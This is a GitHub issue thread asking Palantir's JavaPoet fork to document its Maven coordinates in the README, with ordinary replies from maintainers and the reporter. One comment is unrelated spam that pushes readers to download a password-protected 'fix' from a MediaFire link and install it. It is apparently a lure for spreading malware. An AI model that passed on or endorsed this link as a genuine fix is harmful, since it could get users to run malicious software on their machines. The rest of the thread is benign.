### ISSUE TITLE
Mention Maven coordinates in README

### ISSUE THREAD

**Issue by Marcono1234** [palantir/javapoet#54]
First of all, thanks a lot for forking the JavaPoet project and implementing some of its missing functionality!

In case this fork is intended to be used by the public (and its main purpose is not for Palantir only), it would be useful to mention the Maven coordinates (I assume `com.palantir.javapoet:javapoet`) in the README. For example with code snippets for Gradle and Maven, and maybe a link to Maven Central and [javadoc.io](https://javadoc.io/doc/com.palantir.javapoet/javapoet).

Currently it is not obvious that artifacts have already been published, and what their coordinates are.

**Comment by carterkozak** [comment]
Good idea! Our goal is to maintain this library, since we use poet pretty heavily, but not to make it in any way Palantir-specific. Would you be interested in making that docs PR? Otherwise someone on my end can take a crack at it in the next couple weeks

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Marcono1234** [comment]
Have created #56, I hope it is ok like this.

I wasn't aware though that this requires a CLA...; I won't sign it for this, sorry.

**Comment by Marcono1234** [comment]
> Our goal is to maintain this library, since we use poet pretty heavily

In that case might be worth commenting on https://github.com/square/javapoet/discussions/866. What do you think?

**Comment by carterkozak** [comment]
> In that case might be worth commenting on https://github.com/square/javapoet/discussions/866. What do you think?

Great idea, done!

**Comment by Marcono1234** [comment]
square/javapoet has been archived and its README now [points to the Palantir repository](https://github.com/square/javapoet?tab=readme-ov-file#deprecated), just in case you are wondering about increased traffic in the future.
